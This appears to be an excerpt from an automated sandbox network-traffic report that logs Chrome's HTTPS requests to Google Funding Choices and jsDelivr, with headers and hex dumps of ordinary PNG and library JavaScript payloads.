                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC6633INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 b0 08 03 00 00 00 dc ff 43 fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 df 50 4c 54 45 51 2b d4 e8 e4 f9 ff ff ff fe fd ff 78 5a de a8 95 ea 5d 3a d7 63 41 d8 d1 c6 f4 8c 72 e2 e0 d9 f7 54 2f d5 a0 8b e8 f8 f7 fd 68 47 da ce c3 f3 ef eb fb 5d 39 d7 b8 a9 ed 79 5c de e1 da f8 a4 90 e8 f9 f8 fd 69 48 da d3 c9 f4 52 2c d4 8f 77 e3 f1 ee fc 5f 3c d7 bb ad ee fe fe ff 7e 62 df e5 df f9 56 32 d5 a7 94 e9 fa f9 fe 6d 4d db d4 cb f4 93 7b e4 f2 ef fc 60 3d d8 bf b1 ef 7f 64 df e6 e0 f9 aa 98 ea fb fa fe 6e 4e db d6 cd f5 96 7f e5 f5 f3 fc c2 b5 f0 84
                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDRCgAMAa cHRMz&u0`:pQ<PLTEQ+xZ]:cArT/hG]9y\iHR,w_<~bV2mM{`=dnN


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      18192.168.2.449783142.250.185.1424437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC653OUTGET /i/pub-9495854422341365?ers=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                      Referer: https://trksyln.net/
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:26 GMT
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-QKZNR-ywaWWGPt-TR3UA2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                      reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw15BikPj6kkkLiJ3SZ7CGAHHrzXOs04E46d951hIgdte6yOoPxIYKl1idgdix6BKrJxCr9lxiNQfi--susT4H4iKJK6wtQHy76QrrYyBm-HqFlQOIhXg41k3p38kmsKHzwWdGJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDA2MDPQOD-AIDAIICP-o"
                                                                                                                                                                                                                                                                                                                      Server: ESF
                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 36 65 64 65 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67
                                                                                                                                                                                                                                                                                                                      Data Ascii: 6edeif (typeof __googlefc === 'undefined' || typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{_._F_tog
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22
                                                                                                                                                                                                                                                                                                                      Data Ascii: :function(){return fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 67 20 69 6e 73 74 61 6e 63 65 6f 66 20 65 29 74 68 69 73 2e 68 61 28 67 29 3b 65 6c 73 65 7b 61 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69
                                                                                                                                                                                                                                                                                                                      Data Ascii: g instanceof e)this.ha(g);else{a:switch(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?thi
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 71 28 67 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 6b 2e 64 6f 6e 65 3f 63 28 5b 5d 29 3a 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 77 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 44 29 7b 41 5b 78 5d 3d 44 3b 42 2d 2d 3b 42 3d 3d 30 26 26 6d 28 41 29 7d 7d 76 61 72 20 41 3d 5b 5d 2c 42 3d 30 3b 64 6f 20 41 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 42 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 77 28 41 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68
                                                                                                                                                                                                                                                                                                                      Data Ascii: q(g),k=h.next();return k.done?c([]):new e(function(m,n){function w(x){return function(D){A[x]=D;B--;B==0&&m(A)}}var A=[],B=0;do A.push(void 0),B++,c(k.value).mb(w(A.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null)th
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 75 72 6e 20 68 7d 29 3b 0a 70 28 22 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c 6b 2e 73 69
                                                                                                                                                                                                                                                                                                                      Data Ascii: urn h});p("Map",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||k.get({x:4})||k.set({x:4},"t")!=k||k.si
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 61 72 20 6d 3d 68 5b 31 5d 3b 72 65 74 75 72 6e 20 66 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6d 29 7b 66 6f 72 28 3b 6d 2e 68 65 61 64 21 3d 68 5b 31 5d 3b 29 6d 3d 6d 2e 71 61 3b 66 6f 72 28 3b 6d 2e 6e 65 78 74 21 3d 6d 2e 68 65 61 64 3b 29 72 65 74 75 72 6e 20 6d 3d 0a 6d 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63
                                                                                                                                                                                                                                                                                                                      Data Ascii: ar m=h[1];return fa(function(){if(m){for(;m.head!=h[1];)m=m.qa;for(;m.next!=m.head;)return m=m.next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if(func
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 2c 63 7c 7c 30 29 21 3d 3d 2d 31 7d 7d 29 3b 0a 70 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 68 7d 3b 76 61 72 20 65 3d 5b 5d 2c 66 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28
                                                                                                                                                                                                                                                                                                                      Data Ascii: ,c||0)!==-1}});p("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(h){return h};var e=[],f=typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 65 72 28 64 29 3b 64 3c 30 26 26 28 64 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 65 2b 64 29 29 3b 66 6f 72 28 63 3d 4e 75 6d 62 65 72 28 63 7c 7c 30 29 3b 63 3c 64 3b 63 2b 2b 29 74 68 69 73 5b 63 5d 3d 62 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 29 3b 76 61 72 20 74 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 31 36 41 72 72 61
                                                                                                                                                                                                                                                                                                                      Data Ascii: er(d);d<0&&(d=Math.max(0,e+d));for(c=Number(c||0);c<d;c++)this[c]=b;return this}});var ta=function(a){return a?a:Array.prototype.fill};p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("Int16Arra
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 41 61 3f 21 21 5f 2e 42 61 26 26 5f 2e 42 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 61 28 29 3f 43 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 44 61 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 44 61 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 45 61 28 29 3f 30 3a 5f 2e 44 61 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 44 61 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 48 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 45 72 72
                                                                                                                                                                                                                                                                                                                      Data Ascii: =function(){return _.Aa?!!_.Ba&&_.Ba.brands.length>0:!1};Ga=function(){return Ea()?Ca("Chromium"):(_.Da("Chrome")||_.Da("CriOS"))&&!(Ea()?0:_.Da("Edge"))||_.Da("Silk")};_.Ia=function(a){return Ha&&a!=null&&a instanceof Uint8Array};La=function(){var a=Err
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:26 UTC1937INData Raw: 6f 6e 28 61 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 77 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 75 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 76 62 28 5b 5d 2c 7b 7d 29 3b 75 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 75 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 26 26 28 61 5b 53 79 6d 62
                                                                                                                                                                                                                                                                                                                      Data Ascii: on(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};wb=function(a){if(ub===void 0){var b=new vb([],{});ub=Array.prototype.concat.call([],b).length===1}ub&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symb


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      19192.168.2.449806151.101.193.2294437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:28 UTC388OUTGET /npm/bootstrap-affix@1.0.1/assets/js/affix.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                      Content-Length: 2754
                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                      X-JSD-Version: 1.0.1
                                                                                                                                                                                                                                                                                                                      X-JSD-Version-Type: version
                                                                                                                                                                                                                                                                                                                      ETag: W/"ac2-OwtoaIo59xCfoKcJqLdO5pCpf00"
                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 18:19:29 GMT
                                                                                                                                                                                                                                                                                                                      Age: 658739
                                                                                                                                                                                                                                                                                                                      X-Served-By: cache-fra-eddf8230032-FRA, cache-dfw-kdal2120097-DFW
                                                                                                                                                                                                                                                                                                                      X-Cache: MISS, HIT
                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC1378INData Raw: 2f 2a 2a 0a 20 2a 20 4d 69 6e 69 66 69 65 64 20 62 79 20 6a 73 44 65 6c 69 76 72 20 75 73 69 6e 67 20 54 65 72 73 65 72 20 76 35 2e 31 39 2e 32 2e 0a 20 2a 20 4f 72 69 67 69 6e 61 6c 20 66 69 6c 65 3a 20 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 61 66 66 69 78 40 31 2e 30 2e 31 2f 61 73 73 65 74 73 2f 6a 73 2f 61 66 66 69 78 2e 6a 73 0a 20 2a 0a 20 2a 20 44 6f 20 4e 4f 54 20 75 73 65 20 53 52 49 20 77 69 74 68 20 64 79 6e 61 6d 69 63 61 6c 6c 79 20 67 65 6e 65 72 61 74 65 64 20 66 69 6c 65 73 21 20 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6a 73 64 65 6c 69 76 72 2e 63 6f 6d 2f 75 73 69 6e 67 2d 73 72 69 2d 77 69 74 68 2d 64 79 6e 61 6d 69 63 2d 66 69 6c 65 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                      Data Ascii: /** * Minified by jsDelivr using Terser v5.19.2. * Original file: /npm/bootstrap-affix@1.0.1/assets/js/affix.js * * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files */!function(
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC1376INData Raw: 73 2e 24 74 61 72 67 65 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 65 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 69 6e 6e 65 64 4f 66 66 73 65 74 3d 65 2e 74 6f 70 2d 74 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 57 69 74 68 45 76 65 6e 74 4c 6f 6f 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 74 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 2c 74 68 69 73 29 2c 31 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 65 63 6b 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 29 7b 76 61 72 20 65 3d
                                                                                                                                                                                                                                                                                                                      Data Ascii: s.$target.scrollTop(),e=this.$element.offset();return this.pinnedOffset=e.top-t},i.prototype.checkPositionWithEventLoop=function(){setTimeout(t.proxy(this.checkPosition,this),1)},i.prototype.checkPosition=function(){if(this.$element.is(":visible")){var e=


                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                      20192.168.2.449807151.101.193.2294437284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:28 UTC391OUTGET /npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                      Host: cdn.jsdelivr.net
                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                      2024-10-31 18:19:29 UTC773INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                      Connection: close
